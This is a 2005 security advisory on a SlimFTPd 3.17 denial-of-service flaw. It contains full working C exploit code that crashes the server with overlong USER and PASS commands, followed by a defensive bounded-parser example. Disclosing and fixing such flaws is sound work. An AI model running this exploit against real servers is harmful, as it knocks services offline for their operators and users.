Sunday, September 04, 2005

[NT] Slim FTPd DoS (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Slim FTPd DoS (Exploit)
------------------------------------------------------------------------

SUMMARY

" <http://www.whitsoftdev.com/slimftpd/> SlimFTPd is a fully
standards-compliant FTP server implementation with an advanced virtual
file system."

Due to improper length validation by the SlimFTPd server, attackers can
cause the program to crash, effectively causing a DoS against the product.

DETAILS

Vulnerable Systems:
* SlimFTPd version 3.17

Exploit:
/*

Slim FTPd 3.17 Remote DoS PoC Exploit

Public proof of concept code by "Critical Security" http://www.critical.lt

Use for education only! Don't break the law...

Original Advisory may be found here:
http://www.critical.lt/?vulnerabilities/8
Exploit compiles without warnings on FreeBSD 5.4-RELEASE
Tested against Slim FTPd 3.17 on Windows XP SP 2

Compilation:

mircia$ uname -sr
FreeBSD 5.4-RELEASE-p6
mircia$ gcc this_file.c -o expl
mircia$ ./expl localhost
here goes output

*/

#include <stdio.h>
#include <string.h>
#include <strings.h>    /* bzero, bcopy */
#include <unistd.h>     /* write, close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 21
/* Our dirty requests ;) */
#define USER "USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n"
#define PASS "PASS aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n"
#define QUIT "QUIT"     /* after all we just quit */

int main(int argc, char *argv[]) {
    register int s;
    struct sockaddr_in sa;
    struct hostent *he;
    char *host;

    if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
        perror("pizute");
        return 1;
    }

    bzero(&sa, sizeof sa);
    sa.sin_family = AF_INET;

    if (argc <= 1) {
        printf("%s%s%s", "Usage: ", argv[0], " hostname or ip\n\n");
        return 0;
    }

    host = (char *)argv[1];
    sa.sin_port = htons(PORT);

    if ((he = gethostbyname(host)) == NULL) {
        perror(host);
        return 2;
    }

    printf("%s", "\nCritical Security web-site: http://www.critical.lt\n");
    printf("%s", "Slim FTPd 3.17 lame PoC DoS exploit.\n");
    printf("%s", "greets to Lithuanian girlz :)\n\n");
    printf("%s%s%s", "[*] Initiating attack against ", host, "\n");

    bcopy(he->h_addr_list[0], &sa.sin_addr, he->h_length);

    if (connect(s, (struct sockaddr *)&sa, sizeof sa) < 0) {
        perror("connect");
        return 3;
    }

    /* As written by the author: sizeof counts the terminating NUL, so each
     * write also sends one 0x00 byte, and QUIT is sent without CRLF. */
    write(s, USER, sizeof USER); /* dirty dirty dirty... */
    write(s, PASS, sizeof PASS);
    write(s, QUIT, sizeof QUIT);

    printf("%s", "[*] Stuff sent, now wait for 30-120 seconds,\n"
                 "server should crash, if's not - try again or write a better code :P\n");

    close(s);
    return 0;
}

/* EoF */
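The advisory attributes the crash to improper length validation of the command arguments. As an added example (not SlimFTPd's code, and not a reconstruction of its actual bug), the following bounded FTP command-line parser in C shows the check a server needs: every length is compared with the destination capacity before anything is copied, so an overlong USER or PASS argument is answered with a 5xx reply rather than overrunning a buffer. The sample USER line with a 40-byte argument is constructed here, and the result-code names and reply texts are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Result codes of the bounded parser (names are this example's, not SlimFTPd's). */
enum { FTP_OK = 0, FTP_ERR_NOCRLF = -1, FTP_ERR_VERB = -2, FTP_ERR_ARG = -3 };

/* Split "VERB [argument]\r\n" into verb and argument. Each length is checked
 * against the destination capacity BEFORE any copy, so an overlong USER/PASS
 * argument becomes an error code (and a 5xx reply) instead of a buffer overrun. */
int parse_ftp_command(const char *line, size_t len,
                      char *verb, size_t verb_cap, char *arg, size_t arg_cap)
{
    const char *end = memchr(line, '\r', len), *sp;
    size_t vlen, alen;
    if (end == NULL || (size_t)(end - line) + 1 >= len || end[1] != '\n')
        return FTP_ERR_NOCRLF;                 /* RFC 959: lines end in CRLF */
    sp   = memchr(line, ' ', (size_t)(end - line));
    vlen = sp ? (size_t)(sp - line) : (size_t)(end - line);
    alen = sp ? (size_t)(end - sp) - 1 : 0;
    if (vlen == 0 || vlen + 1 > verb_cap) return FTP_ERR_VERB;
    if (alen + 1 > arg_cap)              return FTP_ERR_ARG;
    memcpy(verb, line, vlen);              verb[vlen] = '\0';
    memcpy(arg, sp ? sp + 1 : end, alen);  arg[alen]  = '\0';
    return FTP_OK;
}
/* Reply for each outcome; the session survives every malformed line. */
const char *ftp_reply_for(int rc)
{
    switch (rc) {
    case FTP_OK:       return "200 Command okay.\r\n";
    case FTP_ERR_ARG:  return "501 Syntax error: argument too long.\r\n";
    case FTP_ERR_VERB: return "500 Syntax error: bad verb.\r\n";
    default:           return "500 Syntax error: line must end in CRLF.\r\n";
    }
}
/* Parse one line with an 8-byte verb buffer and the given argument cap. */
int check_line(const char *line, size_t arg_cap)
{
    char verb[8], arg[128];
    if (arg_cap > sizeof arg) arg_cap = sizeof arg;
    return parse_ftp_command(line, strlen(line), verb, sizeof verb, arg, arg_cap);
}
int main(void)
{   /* Constructed sample: a USER line with a 40-byte argument, at two caps. */
    const char *user = "USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n";
    printf("cap 64: %s", ftp_reply_for(check_line(user, 64)));   /* 200 */
    printf("cap 32: %s", ftp_reply_for(check_line(user, 32)));   /* 501 */
    return 0;
}
```

The same parser also rejects the PoC's bare "QUIT" (no CRLF) with a 500 reply instead of treating it as a complete command.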

ADDITIONAL INFORMATION

The information has been provided by mircia <mailto:mircia@critical.lt>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
